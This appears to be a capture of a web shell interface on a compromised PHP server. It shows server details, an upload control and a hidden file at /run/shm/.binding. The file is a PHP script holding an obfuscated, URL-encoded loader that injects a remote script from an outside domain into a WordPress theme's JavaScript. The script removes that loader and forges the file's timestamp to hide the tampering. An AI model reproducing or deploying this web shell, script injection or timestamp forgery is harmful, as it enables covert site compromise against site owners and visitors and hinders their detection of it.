HEX
Server: LiteSpeed
System: Linux php-prod-1.spaceapp.ru 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
User: xnsbb3110 (1041)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //run/shm/.binding
<?php  $path = '{$_SERVER['DOCUMENT_ROOT']}/wp-content/themes/vivadecor/js/optimization.js'; $ft = 1752140380; $code = rawurldecode('%3B%28function%28f%2Ci%2Cu%2Cw%2Cs%29%7Bw%3Df.createElement%28i%29%3Bs%3Df.getElementsByTagName%28i%29%5B0%5D%3Bw.async%3D1%3Bw.src%3Du%3Bs.parentNode.insertBefore%28w%2Cs%29%3B%7D%29%28document%2C%27script%27%2C%27https%3A//content-website-analytics.com/script.js%27%29%3B'); if (file_exists($path) && is_writable($path)) {     $content = file_get_contents($path);     if (strpos($content, $code) !== FALSE) {         $content = str_replace($code, '', $content);         if (file_put_contents($path, $content)) {             @touch($path, $ft);             die('!success!');         }     } else {         die('!success!');     } } die('!ended!');